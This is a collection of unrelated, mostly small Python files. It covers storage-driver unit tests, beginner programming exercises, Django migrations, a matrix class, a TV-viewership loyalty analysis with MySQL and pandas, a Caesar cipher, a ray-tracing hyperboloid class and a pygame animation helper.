self.assertEqual(driver.has_file(vault_id, file_id), True)
driver.assign_block(vault_id, file_id, 'block_a', 0)
driver.assign_block(vault_id, file_id, 'block_b', 1024)
with self.assertRaises(GapError) as ctx:
driver.finalize_file(vault_id, file_id, 2048)
self.assertEqual(ctx.exception.vault_id, vault_id)
self.assertEqual(ctx.exception.file_id, file_id)
self.assertEqual(ctx.exception.startpos, 0)
self.assertEqual(ctx.exception.endpos, 2048)
self.assertEqual(driver.is_finalized(vault_id, file_id),
False)
def test_file_assignment_registration(self):
driver = self.create_driver()
hdr_data = {
'x-project-id': self.create_project_id(),
'x-auth-token': ''
}
self.init_context(hdr_data)
vault_id = self.create_vault_id()
file_id = self.create_file_id()
self.assertEqual(driver.has_file(vault_id, file_id), False)
driver.create_file(vault_id, file_id)
self.assertEqual(driver.has_file(vault_id, file_id), True)
# Create one block before assigning and one block after
driver.register_block(vault_id, 'block_a', 1024)
driver.assign_block(vault_id, file_id, 'block_a', 0)
driver.assign_block(vault_id, file_id, 'block_b', 1024)
driver.register_block(vault_id, 'block_b', 1024)
self.assertEqual(driver.is_finalized(vault_id, file_id), False)
driver.finalize_file(vault_id, file_id, 2048)
self.assertEqual(driver.is_finalized(vault_id, file_id),
True)
def test_file_assignment(self):
driver = self.create_driver()
hdr_data = {
'x-project-id': self.create_project_id(),
'x-auth-token': ''
}
self.init_context(hdr_data)
vault_id = self.create_vault_id()
file_id = self.create_file_id()
normal_block_size = 333
gap_block_size = 222
overlap_block_size = 444
# GAP at front (miss the 1st block)
num_blocks = int(0.5 * conf.api_configuration.max_returned_num)
block_ids = ['block_{0}'.format(id) for id in range(1, num_blocks)]
offsets = [x * normal_block_size for x in range(1, num_blocks)]
blockpairs = dict(zip(block_ids, offsets))
# Create a file
driver.create_file(vault_id, file_id)
file_length = driver.file_length(vault_id, file_id)
assert (file_length == 0)
# Assign each block
for bid, offset in blockpairs.items():
driver.assign_block(vault_id, file_id, bid, offset)
assert not driver.is_finalized(vault_id, file_id)
# GAPs (gap at front)
for bid, offset in blockpairs.items():
driver.register_block(vault_id, bid, gap_block_size)
with self.assertRaises(GapError) as ctx:
res = driver.finalize_file(vault_id, file_id)
self.assertEqual(ctx.exception.vault_id, vault_id)
self.assertEqual(ctx.exception.file_id, file_id)
self.assertEqual(ctx.exception.startpos, 0)
self.assertEqual(ctx.exception.endpos, 333)
assert not driver.is_finalized(vault_id, file_id)
# OVERLAPs (gap at front)
for bid, offset in blockpairs.items():
driver.unregister_block(vault_id, bid)
driver.register_block(vault_id,
bid, overlap_block_size)
with self.assertRaises(GapError) as ctx:
res = driver.finalize_file(vault_id, file_id)
self.assertEqual(ctx.exception.vault_id, vault_id)
self.assertEqual(ctx.exception.file_id, file_id)
self.assertEqual(ctx.exception.startpos, 0)
self.assertEqual(ctx.exception.endpos, 333)
assert not driver.is_finalized(vault_id, file_id)
# put back the missed block at the front
# Create a gap in the middle
block_ids.insert(0, 'block_0')
blockpairs['block_0'] = 0
driver.assign_block(vault_id, file_id, 'block_0', 0)
for bid, offset in blockpairs.items():
driver.unregister_block(vault_id, bid)
driver.register_block(vault_id, bid, gap_block_size)
with self.assertRaises(GapError) as ctx:
res = driver.finalize_file(vault_id, file_id)
self.assertEqual(ctx.exception.vault_id, vault_id)
self.assertEqual(ctx.exception.file_id, file_id)
self.assertEqual(ctx.exception.startpos, 222)
self.assertEqual(ctx.exception.endpos, 333)
assert not driver.is_finalized(vault_id, file_id)
# Create a overlap in the middle
for bid, offset in blockpairs.items():
driver.unregister_block(vault_id, bid)
driver.register_block(vault_id,
bid, overlap_block_size)
with self.assertRaises(OverlapError) as ctx:
res = driver.finalize_file(vault_id, file_id)
self.assertEqual(ctx.exception.vault_id, vault_id)
self.assertEqual(ctx.exception.file_id, file_id)
self.assertEqual(ctx.exception.block_id, 'block_1')
self.assertEqual(ctx.exception.startpos, 333)
self.assertEqual(ctx.exception.endpos, 444)
assert not driver.is_finalized(vault_id, file_id)
# Fix and back to normal
for bid, offset in blockpairs.items():
driver.unregister_block(vault_id, bid)
driver.register_block(vault_id, bid, normal_block_size)
# gap at the eof.
with self.assertRaises(GapError) as ctx:
res = driver.finalize_file(vault_id, file_id, file_size=14000)
self.assertEqual(ctx.exception.vault_id, vault_id)
self.assertEqual(ctx.exception.file_id, file_id)
self.assertEqual(ctx.exception.startpos, 13320)
self.assertEqual(ctx.exception.endpos, 14000)
assert not driver.is_finalized(vault_id, file_id)
# overlap at the eof.
with self.assertRaises(OverlapError) as ctx:
res = driver.finalize_file(vault_id, file_id, file_size=12900)
self.assertEqual(ctx.exception.vault_id, vault_id)
self.assertEqual(ctx.exception.file_id, file_id)
self.assertEqual(ctx.exception.startpos, 12900) # end of file
self.assertEqual(ctx.exception.endpos, 13320) # Overlap past EOF
assert not driver.is_finalized(vault_id, file_id)
# This should now succeed and the file
# should be successfully finalized
res = driver.finalize_file(vault_id, file_id, file_size=13320)
assert not res
assert driver.is_finalized(vault_id, file_id)
file_length = driver.file_length(vault_id, file_id)
assert (file_length == 13320)
# Now create a generator of the files. The output
# should be in the same order as block_ids
offset = 0
limit = 4
retgen = \
driver.create_file_block_generator(vault_id, file_id, offset,
limit)
fetched_blocks = list(retgen)
# The driver actually returns limit+1 so that any
# caller knows that the list is truncated.
self.assertEqual(len(fetched_blocks), limit)
# -1 to exclude the trailer
for x in range(0, limit):
self.assertEqual(fetched_blocks[x][0], block_ids[x])
# Add 2 more blocks that aren't assigned.
driver.register_block(vault_id, 'unassigned_1', 1024)
driver.register_block(vault_id, 'unassigned_2', 1024)
num_blocks += 2
# Now create a generator of the files. The output
# should be in the same order as block_ids
# Test driver branch with a given marker
gen = driver.create_block_generator(vault_id, marker=0)
# Test driver branch with a default marker
gen = driver.create_block_generator(vault_id)
fetched_blocks = list(gen)
self.assertEqual(len(fetched_blocks), num_blocks)
# Now try file_block_generator with no limit
# Force returning an empty list by an unreasonable offset.
retgen = \
driver.create_file_block_generator(
vault_id, file_id, offset=999999999, limit=None)
# A good set.
retgen = \
driver.create_file_block_generator(
vault_id, file_id, offset=None, limit=None)
output = sorted(list(retgen))
prep = sorted(list(x for x in blockpairs.items()))
self.assertEqual(output, prep)
def test_file_generator(self):
# Adds a bunch of files and checks the generator
driver = self.create_driver()
hdr_data = {
'x-project-id': self.create_project_id(),
'x-auth-token': ''
}
self.init_context(hdr_data)
vault_id = self.create_vault_id()
num_files = 10
# Create a list of 100 files
file_ids = [self.create_file_id() for _ in range(0, num_files)]
for file_id in file_ids:
assert not driver.has_file(vault_id, file_id)
out_id = driver.create_file(vault_id, file_id)
self.assertEqual(out_id, file_id)
assert driver.has_file(vault_id, file_id)
# None of the files have been finalized so we should
# get none back
gen = driver.create_file_generator(vault_id)
output = list(gen)
self.assertEqual(output, [])
# Now finalize the files and try to get them
for file_id in file_ids:
driver.finalize_file(vault_id, file_id)
gen = driver.create_file_generator(vault_id)
# Convert to a list of file ids.
output = list(gen)
# Why sorted? Deuce returns file ids sorted, but the list
# of file ids that we generated were not sorted when we
# created them above.
self.assertEqual(output, sorted(file_ids))
# Now try with markers
gen = driver.create_file_generator(vault_id,
marker=sorted(file_ids)[2], limit=3)
output = list(gen)
self.assertEqual(len(output), 3) # Limited query to 3
# We should be able to compare the list of
# file ids here with the ones that come from
# the other list
target_list = sorted(file_ids)[2:5]
self.assertEqual(target_list, output)
|
# -*- coding:utf-8 -*-
#例5.20训练3:高级
a = 1
print 'Cheers! '
while a<3:
c = a
print a
b = 1
while b<4:
c += a
print c
if a==1 and c>=4:
print 'Let\'s do this some more! '
else:
if a==2 and c>=8:
print 'Who do we appreciate?'
b += 1
a += 1
|
def main():
# Sum all numbers between 10 and 1,000
a = 10
b = 1000
total_sum = 0
while b >= a:
total_sum += a
a += 1
print(total_sum)
if __name__ == '__main__':
main()
|
cores = {'azul': '\033[1;34m',
'vermelho': '\033[1;31m',
'amarelo': '\033[1;33m', 'limpa': '\033[m',
'branco': '\033[97m',
'magenta': '\033[1;35m',
'black': '\033[1;30;107m'}
print(' {}MEDIDAS E CLASSIFICAÇÕES DE TRIANGULOS{}'.format(cores['magenta'], cores['limpa']))
a = float(input('1º Segmento: '))
print('=='*25)
b = float(input('2° Segmento: '))
print('=='*26)
c = float(input('3° Segmento: '))
pformar = a < b+c and b < c+a and c < a+b
nformar = a > b+c and b > (a+c) and c < (a+b)
if pformar and a != b and b != c and c != a:
print('{}Os segmentos PODEM formar um triângulo!{}'.format(cores['azul'], cores['limpa']))
print('{}O triangulo é ESCALENO{}!'.format(cores['vermelho'], cores['limpa']))
elif pformar and a == b and b == c and c==a:
print('Os segmentos PODEM formar um triângulo!')
print('{}O triangulo é EQUILÁTERO{}'.format(cores['amarelo'], cores['limpa']))
elif pformar and a==b and c != a and c != b:
print('{}Os segmentos PODEM formar um triângulo!{}'.format(cores['branco'], cores['limpa']))
print('{}O triangulo é o ISÓSCELES!{}'.format(cores['magenta'], cores['limpa']))
elif pformar and b==c and a != c and a != b:
print('{}Os segmentos PODEM formar um triângulo!{}'.format(cores['branco'], cores['limpa']))
print('{}O triangulo é o ISÓSCELES!{}'.format(cores['magenta'], cores['limpa']))
elif pformar and c== a and b != c and b != a:
print('{}Os segmentos PODEM formar um triângulo!{}'.format(cores['branco'], cores['limpa']))
print('{}O triangulo é o ISÓSCELES!{}'.format(cores['magenta'], cores['limpa']))
else:
print('{}Os segmentos NÃO PODEM formar um triângulo!{}'.format(cores['black'], cores['limpa']))
|
# Generated by Django 3.0.5 on 2020-04-30 15:43
from django.conf import settings
from django.db import migrations
import django.db.models.deletion
import django_currentuser.db.models.fields
import django_currentuser.middleware
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('book', '0002_book_categories'),
]
operations = [
migrations.AddField(
model_name='book',
name='created_by',
field=django_currentuser.db.models.fields.CurrentUserField(default=django_currentuser.middleware.get_current_authenticated_user, editable=False, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='created_by_book_books', to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='book',
name='updated_by',
field=django_currentuser.db.models.fields.CurrentUserField(default=django_currentuser.middleware.get_current_authenticated_user, editable=False, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='updated_by_book_books', to=settings.AUTH_USER_MODEL),
),
]
|
import math
def f(x):
return (x**4/500.000)-(x**2/200.000)-(3/250.000)
def g(x):
return -(x**3/30.000)+(x/20.000)+(1/6.000)
n = 0.00001 #szer. prostokąta miarowego
lewo = 2 #lewa krawędź figury
gora = f(10) #górna krawędź figury
dol = g(10) # dolna krawędź figury
p1 = 0 #pole górnego obszaru figury
p2 = 0 #pole dolnego obszaru figury
#zad 1
x = 2
while x <= 10:
x += n
p1 += n * (gora - f(x))
p2 += n * (abs(dol) - abs(g(x)))
szer = 8
wys = abs(gora) + abs(dol)
p = wys * szer
print('Pozostała powierzchnia materiału: ', round(p - (p1+p2), 3))
#zad 2
n = 8/1000
kf = 0
kg = 0
x = 2
while x <= 10:
fa = [x, f(x)]
fb = [x+n, f(x+n)]
ga = [x, g(x)]
gb = [x+n, g(x+n)]
kf += ( (fa[0]-fb[0])**2 + (fa[1]-fb[1])**2)**(1/2)
kg += ( (ga[0]-gb[0])**2 + (ga[1]-gb[1])**2)**(1/2)
x += n
obw = kf + kg + 2*szer + wys
print('Należy zakupić:',math.ceil(obw),'m taśmy')
#zad 3
n = 0.25
x = 10
dlugosc = 0
while x >= 0:
x -= n
dlugosc += math.floor(f(x) + abs(g(x)))
print('Długość pasów wyciętych z pozostałości materiału:',dlugosc,'m')
|
#!/usr/bin/env/ python3.6
# HW #L5.1 Matrix
class Matrix:
import random
from functools import reduce
def __init__(self, *args) -> None:
if len(args) == 1:
matrix = args[0]
# Check matrix consistency
# If all rows have equal length -> True
if len(set([len(row) for row in matrix])) == 1:
self.matrix = matrix
self.rows = len(self.matrix)
self.columns = len(self.matrix[0])
else:
raise ValueError('Inconsistent matrix. Inequality of row lengths.')
elif len(args) == 2:
self.rows = args[0]
self.columns = args[1]
self.matrix = [self.random.sample(range(101), self.columns) for usless_var in range(self.rows)]
else:
raise ValueError('Wrong number of arguments.')
def __str__(self):
self.__string = str(self.matrix)
return self.__string
def __getitem__(self, pos):
row, column = pos
return self.matrix[row][column]
def __setitem__(self, pos, value):
row, column = pos
self.matrix[row][column] = value
def __repr__(self):
self.__rstring = '\n'.join([str(row) for row in self.matrix])
return self.__rstring
def __add__(self, other):
if other.rows == self.rows and other.columns == self.columns:
return Matrix([list(map(lambda x, y: x + y,
self.matrix[row],
other.matrix[row])) for row in range(self.rows)])
else:
raise ValueError('Matrix sizes are not equal.')
def __sub__(self, other):
if other.rows == self.rows and other.columns == self.columns:
return Matrix([list(map(lambda x, y: x - y,
self.matrix[row],
other.matrix[row])) for row in range(self.rows)])
else:
print('Make exception here')
def __mul__(self, other):
if isinstance(other, Matrix):
if self.columns == other.rows:
other = other.transpose()
result = list()
for row in range(self.rows):
raw = list()
for column in range(other.rows):
res = list(map(lambda x, y: x * y, self.matrix[row], other.matrix[column]))
res = self.reduce(lambda a, i: a + i, res, 0)
raw.append(res)
result.append(raw)
return Matrix(result)
else:
raise ValueError('Unsuitable dimensions of operands.')
elif isinstance(other, int):
res = list()
for row in range(self.rows):
res.append([item * other for item in self.matrix[row]])
return Matrix(res)
else:
raise ValueError('Wrong operand type. Must be int or Matrix.')
def __eq__(self, other):
if other.rows == self.rows and other.columns == self.columns:
result = True
for row in range(self.rows):
for col in range(self.columns):
result = result and self.matrix[row][col] == other.matrix[row][col]
else:
raise ValueError('Unsuitable dimensions of operands.')
return result
def is_square(self):
"""
Check if matrix is square.
>>> a = Matrix([[1, 2], [3, 4]])
>>> a.is_square()
True
>>> b = Matrix([[1, 2, 3], [4, 5, 6]])
>>> b.is_square()
False
:return: bool True or False.
"""
return self.rows == self.columns
def transpose(self):
"""
Transpose matrix.
>>> a = Matrix([[1, 2], [3, 4]])
>>> a
[1, 2]
[3, 4]
>>> b = a.transpose()
>>> b
[1, 3]
[2, 4]
:return: Matrix object
"""
res = list()
for col in range(self.columns):
res.append([self.matrix[row][col] for row in range(self.rows)])
return Matrix(res)
def is_symmetric(self, diag='main'):
"""
Check if matrix is symmetrical with respect to the main or anti diagonal.
By default checking by main diagonal.
>>> a = Matrix([[1, 1, 3], [1, 1, 2], [3, 2, 1]])
>>> a
[1, 1, 3]
[1, 1, 2]
[3, 2, 1]
>>> a.is_symmetric()
True
>>> b = Matrix([[5, 4, 1], [6, 2, 4], [3, 6, 5]])
>>> b
[5, 4, 1]
[6, 2, 4]
[3, 6, 5]
>>> b.is_symmetric(diag='anti')
True
>>>
:param diag: could be 'main' or 'anti'. Specify diagonal for symmetric check.
:type diag: str.
:return: None.
"""
if self.is_square():
if diag == 'main':
return self == self.transpose()
elif diag == 'anti':
to_compare = []
for row in range(self.rows):
to_compare.append(self.matrix[row][::-1])
to_compare = Matrix(to_compare[::-1])
return self == to_compare.transpose()
else:
raise ValueError("Wrong diag. Could be 'main' or 'anti")
else:
raise ValueError("Non square matrix.")
# Tests
b = Matrix([[1, 2], [3, 4]])
c = Matrix([[1, 2, 3, 4, 5, 6, 7]])
v = Matrix(2, 2)
try:
t = Matrix([[1, 2, 3], [4, 5, 6, 43]])
except ValueError:
print('Error during matrix creation!')
k = b * 3
print(k)
k = b + v
print(k)
k = b - v
print(b.transpose())
print(v.transpose())
|
import pytest
from .data import temperatures
from .task import get_temperature_closest_to_zero
def test_get_temperature_closest_to_zero():
assert 0.5 == get_temperature_closest_to_zero(temperatures)
assert get_temperature_closest_to_zero([]) == 0
assert get_temperature_closest_to_zero([-1, 2, 4, 0.2, 5, 3, -2, -0.1]) == -0.1
assert get_temperature_closest_to_zero([1, 2, 3, 4, 5, 0, 11]) == 0
assert get_temperature_closest_to_zero([11, -11]) == 11
assert get_temperature_closest_to_zero([120, -3, 55]) == -3
assert get_temperature_closest_to_zero([1, -1, 0.1]) == 0.1
assert get_temperature_closest_to_zero([3, -3]) == 3
|
#Done by Carlos Amaral (21/07/2020)
from plotly.graph_objs import Bar, Layout
from plotly import offline
from die import Die
#Create a D6
die = Die()
#Make some rolls and store the results in a list.
results = []
for roll_num in range(1000):
result = die.roll()
results.append(result)
#Analyse the results.
frequencies = []
for value in range(1, die.num_sides+1):
frequency = results.count(value)
frequencies.append(frequency)
#Visualize the results
x_values = list(range(1, die.num_sides+1)) #Store a bar for each of possible results. Starts at 1 and ends at 6 (6-sided Die)
data = [Bar(x=x_values, y=frequencies)] #Bar()-data set that'll be formatted as bar chart. Needs list of x and y values.
x_axis_config = {'title': 'Result'} #Setting the title of x_axis
y_axis_config = {'title': 'Frequency of Result'}
my_layout = Layout(title='Results of rolling one D6 1000 times', #Layout() returns object that specifies layout and configuration of the
xaxis = x_axis_config, yaxis = y_axis_config) #graph as a whole.
offline.plot({'data': data, 'layout': my_layout}, filename='d6.html')
|
import MySQLdb
import pandas as pd
import numpy as np
from datetime import datetime,date
import fwm_config as fwm_config
#from create_deviceid_program_matrix_primetime import get_all_program_listing
#from create_deviceid_program_matrix_primetime import read_all_device_info
#from create_deviceid_program_matrix_primetime import add_viewtime_info
#from create_deviceid_program_matrix_primetime import filter_7PM_10PM
def get_prog_viewtime_matrix(db, current_month, dma_code, mso):
db_tv_table = 'fwm_tv_%s_2014' %current_month
db_ref_table = 'fwm_ref_%s_2014' %current_month
if dma_code!=-1:
query_dev = """
SELECT DISTINCT device_id FROM {0}
WHERE dma_code = %s;
""".format(db_ref_table)
result = db.query_new(query_dev, dma_code)
elif mso!=-1:
query_dev = """
SELECT DISTINCT device_id FROM {0}
WHERE mso = %s;
""".format(db_ref_table)
result = db.query_new(query_dev, mso)
dev_list = map(lambda x : x['device_id'], result)
print 'number of devices got from ref_table:',len(dev_list)
query_data = """
SELECT device_id, event_date, event_time, program_tms_id, program_title, program_viewtime FROM {0}
WHERE device_id IN %s AND event_id IS NOT NULL
AND event_time BETWEEN '20:00:00' AND '23:00:00';
""".format(db_tv_table)
result = db.query_new(query_data, dev_list) # a tuple
#add_viewtime_info(result,tms_id_prog_name_dict)
#filtered_result = filter_7PM_10PM(result)
print 'Result Count', len(result)
#print 'Filtered Result Count', len(filtered_result)
return list(result)
def viewtime_threshold(viewtime):
return (viewtime>=300) and viewtime or 0 # 5min
#def week_number(date):
#if(date < datetime.date(2014,4,8)):
# return 1
def count_dev_per_prog_weekly(df):
#dev_prog_list = df.groupby(['device_id','program_name','week'],sort = True).sum()
#print df.groupby(['device_id','program_name','week'],sort = True).head()
#effective_list = dev_prog_list[dev_prog_list.viewtime > 600]
#print dev_prog_list.columns
#print dev_prog_list.dtypes
effective_dev_prog_dict = dict()
dev_prog_grouped = df.groupby(['device_id','program_title','week'])
for name,group in dev_prog_grouped:
#viewtime = group.sum(0)['program_viewtime']
viewtime = group['program_viewtime'].sum()
if viewtime > 600: # 10 min
dev = name[0]
prog = name[1]
effective_dev_prog_dict.setdefault(prog,[]).append(dev)
#print effective_dev_prog_dict[effective_dev_prog_dict.keys()[0]]
return effective_dev_prog_dict
def analyse_loyalty(prog_weekly_dev_dict_list, dma_code, mso):
print 'Begin analyzing loyalty ...'
prog_dict = dict()
first_dict = prog_weekly_dev_dict_list[0]
for prog in first_dict:
prog_dict.setdefault(prog,{})['t0'] = len(first_dict[prog])
col_name = ['t0']
sort_col_name = ['t0'] # sort the output data based on these columns
for i in range(1,len(prog_weekly_dev_dict_list)):
col_name.append('t%s' %str(i))
col_name.append('t%s-%s' %(str(i-1),str(i)))
col_name.append('t%s-%s loyalty ratio' %(str(i-1),str(i)))
#sort_col_name.append('t%s-%s' %(str(i-1),str(i)))
sort_col_name.append('t%s' %str(i))
pre_dict = prog_weekly_dev_dict_list[i-1]
curr_dict = prog_weekly_dev_dict_list[i]
for prog, dev_list in curr_dict.items():
prog_dict.setdefault(prog,{})['t%s'%str(i)] = len(dev_list)
try:
common_np = np.intersect1d(pre_dict[prog],dev_list)
prog_dict[prog]['t%s-%s' %(str(i-1),str(i))] = common_np.size
if common_np.size == 0:
prog_dict[prog]['t%s-%s loyalty ratio' %(str(i-1),str(i))] = 0
else:
prog_dict[prog]['t%s-%s loyalty ratio' %(str(i-1),str(i))] = common_np.size*1.0/len(pre_dict[prog])
except KeyError:
prog_dict[prog]['t%s-%s' %(str(i-1),str(i))] = 0
prog_dict[prog]['t%s-%s loyalty ratio' %(str(i-1),str(i))] = 0
prog_list = list()
for key,value in prog_dict.items():
value['program_title'] = key
prog_list.append(value)
df = pd.DataFrame(prog_list)
df = df.fillna(0)
#df = df.sort(sort_col_name, ascending=[0,0,0])
df['viewer_mean'] = df[sort_col_name].mean(axis=1)
df = df.sort('viewer_mean',ascending=0)
col_name.sort(key=lambda x:len(x))
df.to_csv('output_dma=%s_mso=%s.csv'%(dma_code,mso), columns=['program_title']+col_name)
def count_dev_per_prog(dma_code, mso):
db = fwm_config.Database()
filtered_re = get_prog_viewtime_matrix(db, '04', dma_code, mso)
filtered_re.extend(get_prog_viewtime_matrix(db, '05', dma_code, mso))
filtered_re.extend(get_prog_viewtime_matrix(db, '06', dma_code, mso))
df = pd.DataFrame(filtered_re)
#return
#df = df[df.program_tms_id != 'MP_MISSINGPROGRAM'].reset_index(drop=True)
df = df[(df.program_tms_id != 'MP_MISSINGPROGRAM') & (df.program_tms_id is not None)]
df.loc[df.program_title=='2014 NBA Finals','program_title'] = 'NBA Basketball'
df['program_viewtime'] = df['program_viewtime'].map(viewtime_threshold)
df['week'] = df['event_date'].map(lambda x : x.isocalendar()[1])
df = df[(df.week >= 14) & (df.week <= 26)]
#print df.head()
#print df.tail()
#week_groups = df.groupby('week').groups
#prog_weekly_dev_dict_list = map(lambda x : count_dev_per_prog_weekly(df.iloc[x,:]), week_dict.values())
prog_weekly_dev_dict_list = map(lambda x : count_dev_per_prog_weekly(x[1]), df.groupby('week'))
analyse_loyalty(prog_weekly_dev_dict_list, dma_code, mso)
if __name__=='__main__':
# dma = 524 (Atlanta); 501 (New York)
#tasks = [(-1,6760),(524,-1),(501,-1),(-1,6330)] # (dma_code, mso)
tasks = [(524,-1),(501,-1)] # (dma_code, mso)
for task in tasks:
print 'Start to analyze task ', task, ' at: ', datetime.now()
count_dev_per_prog(task[0], task[1])
print 'All Done at: ', datetime.now()
|
def caesar_encryption(str,step):
outtext=[]
crypttext=[]
uppercase = ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z']
lowercase = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z']
for text in str:
if text in uppercase:
index=uppercase.index(text)
crypting=(index+step)%26
crypttext.append(crypting)
newLetter=uppercase[crypting]
outtext.append(newLetter)
elif text in lowercase:
index=lowercase.index(text)
crypting=(index+step)%26
crypttext.append(crypting)
newLetter=lowercase[crypting]
outtext.append(newLetter)
return outtext
code=caesar_encryption('pyThon',2)
print(code) |
import unittest
from modules.User import *
from modules.Role import *
from main import *
from unittest.mock import patch, Mock
class TestSum(unittest.TestCase):
@patch('main.getRoles')
def test_set_user_successful(self, MockRoles):
"""
Test that it set valid set of users
"""
# Arrange
getRoles = MockRoles()
roles = []
roles.append(Role(1, 'Admin', 0))
roles.append(Role(2, 'Manager', 1))
roles.append(Role(3, 'Supervisor', 2))
getRoles.return_value = roles
data = '[{"Id":1,"Name":"Adam Admin","Role":1},{"Id":2,"Name":"Emily Employee","Role":2},{"Id":3,"Name":"Sam Supervisor","Role":3}]'
# Act
result = setUsers(data, loadDefault=False)
# Assert
self.assertEqual(len(result), 3)
@patch('main.getRoles')
def test_set_user_failed(self, MockRoles):
"""
Test that it set valid set of users
"""
# Arrange
getRoles = MockRoles()
roles = []
roles.append(Role(1, 'Admin', 0))
roles.append(Role(2, 'Manager', 1))
roles.append(Role(3, 'Supervisor', 2))
getRoles.return_value = roles
data = '[{"Id":1,"Name":"Adam Admin","Role":1},{"Id":2,"Name":"Emily Employee","Role":2},{"Id":3,"Name":"Sam Supervisor","Role":3}]'
# Act
result = setUsers(data, loadDefault=False)
# Assert
self.assertIsNot(len(result), 6)
def test_set_role_successful(self):
"""
Test that it set valid set of roles
"""
# Arrange
data = '[{"Id":1,"Name":"System Administrator","Parent":0},{"Id":2,"Name":"Location Manager","Parent":1},{"Id":3,"Name":"Supervisor","Parent":2},{"Id":4,"Name":"Employee","Parent":3},{"Id":5,"Name":"Trainer","Parent":3}]'
# Act
result = setRoles(data, loadDefault=False)
# Assert
self.assertEqual(len(result), 5)
def test_get_sub_ordinates_successful(self):
"""
Test that it set valid set of users
"""
# Arrange
setRoles([], loadDefault=True)
setUsers([], loadDefault=True)
# Act
result = getSubOrdinates(4, printResult=False)
# Assert
self.assertEqual(len(result), 3)
if __name__ == '__main__':
unittest.main()
|
islem = input("İslemi Giriniz:")
sayi1 = int(input("Sayi1: "))
sayi2 = int(input("Sayi2: "))
if islem =="1":
sonuc = int(sayi1) + int(sayi2)
print("Sonuc: ", str(sonuc))
elif islem== "2":
sonuc = int(sayi1) - int(sayi2)
print("Sonuc: ", str(sonuc))
elif islem== "3":
sonuc = int(sayi1) * int(sayi2)
print("Sonuc: ", str(sonuc))
elif islem== "4":
sonuc = int(sayi1) / int(sayi2)
print("Sonuc: ", str(sonuc)) |
"""The sum of the primes below 10 is 2 + 3 + 5 + 7 = 17.
Find the sum of all the primes below two million."""
primeArray = [1]*2000000
for x in range(1,2000000):
if primeArray[x] == 1:
iteration = 2
while iteration*(x+1) <= 2000000:
primeArray[iteration*(x+1)-1] = 0
iteration += 1
sumTotal = -1 # One is not a prime number, so we start at -1
for xVal, x in enumerate(primeArray, start = 1):
if x == 1:
sumTotal += xVal
print(sumTotal)
|
# Generated by Django 2.1.7 on 2019-03-06 00:34
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('AppTwo', '0003_auto_20190305_1931'),
]
operations = [
migrations.AlterField(
model_name='user',
name='Email',
field=models.EmailField(max_length=30, unique=True),
),
]
|
from plone.uuid.interfaces import IUUIDGenerator
from zope.interface import implementer
import uuid
@implementer(IUUIDGenerator)
class UUID4Generator:
"""Default UUID implementation.
Uses uuid.uuid4()
"""
def __call__(self):
return uuid.uuid4().hex
|
#! /usr/bin/env python
# -*-coding: utf-8-*-
from math import sqrt, tan
class Hyperboloide():
'''
classe définissant une hyperboloide a deux nappes dans l'espace caractérisée par
[*] son origine (Vector)
[*] ses coefficients a,b et c ([int/float, int/float, int/float])
[*] son absorption aux couleurs RGB ([int, int, int])
'''
def __init__(self, o, c, rho):
self.origin = o
self.coeff = c
self.rho = rho
def intersect(self,ray):
# fonction testant l'intersection entre l'hyperboloide et un rayon
# prend un ray en argument, retourne un objet intersection
# équation de type m*t^2 + n*t + p = 0
# on définit les coefficients à utiliser
a = self.coeff[0]
b = self.coeff[1]
c = self.coeff[2]
x_0 = self.origin[0]
y_0 = self.origin[1]
z_0 = self.origin[2]
u_x = ray.dir[0]
u_y = ray.dir[1]
u_z = ray.dir[2]
u_x0 = ray.origin[0]
u_y0 = ray.origin[1]
u_z0 = ray.origin[2]
# on calcule les coefficients de l'équation
m = (u_x/a)**2 - (u_y/b)**2 + (u_z/c)**2
n = 2 * (u_x*(u_x0 - x_0)/a**2 - u_y*(u_y0 - y_0)/b**2 + u_z*(u_z0 - z_0)/c**2)
p = ((x_0 - u_x0)/a)**2 - ((y_0 - u_y0)/b)**2 + ((z_0 - u_z0)/c)**2 + 1
# on renvoie un objet intersection
return poly2getIntersection(m,n,p)
def getNormale(self, pt):
# fonction retournant le vecteur normal à la sphère en un point donné
a = self.coeff[0]
b = self.coeff[1]
c = self.coeff[2]
x_0 = self.origin[0]
y_0 = self.origin[1]
z_0 = self.origin[2]
return Vector((pt[0]-x_0)/a**2, -(pt[1]-y_0)/b**2, (pt[2]-z_0)/c**2).getNormalized
def poly2getIntersection(a,b,c):
# fonction permettant de résoudre une équation polynomiale d'ordre 2
# prend en argument trois coefficients, retourne un objet intersection
delta = b*b - 4*a*c
result = Intersection()
if delta < 0:
result.has_intersection = False
else:
tmin = (-b - sqrt(delta)) / (2*a)
tmax = (-b + sqrt(delta)) / (2*a)
if tmax < 0:
result.has_intersection = False
else:
result.has_intersection = True
if tmin < 0:
result.t = tmax
else:
result.t = tmin
return result |
from django.contrib import admin
from stackapi import models# Edit 7
# Register your models here.
from .models import Question
admin.site.register(Question)
admin.site.register(models.User)# Edit 6
|
import os
import pygame
class Action:
"""
角色基本活动
"""
def __init__(self, path: str, prefix: str, image_count: int, is_loop: bool):
"""
初始角色行为相关行为
:param path: 路径
:param prefix: 文件名前缀
:param image_count: 图片数量
:param is_loop: 是否循环显示
"""
self.image_index = 0
self.action_images = [] # type:[]
self.image_count = image_count
self.is_loop = is_loop
#加载图片的功能
for i in range(0, image_count):
st = ''
if i < 10:
st = '0' + str(i)
else:
st = str(i)
img_path = os.path.join('resource', 'img', path, prefix + st + '.tga')
self.action_images.append(pygame.image.load(img_path))
def get_current_image(self) -> pygame.image:
"""
获取当前图片
:return:
"""
current_img = self.action_images[self.image_index]
self.image_index += 1
if self.image_index + 1 >= self.image_count:
if self.is_loop:
self.image_index = 0
else:
self.image_index = self.image_count - 1
return current_img
def is_end(self) -> bool:
"""
活动是否结束
:return:
"""
if self.is_loop:
return False
else:
if self.image_index >= self.image_count - 1:
return True
else:
return False
def reset(self):
"""
重置活动
:return:
"""
self.image_index = 0
# 0 下 1 左 2 上 3 右
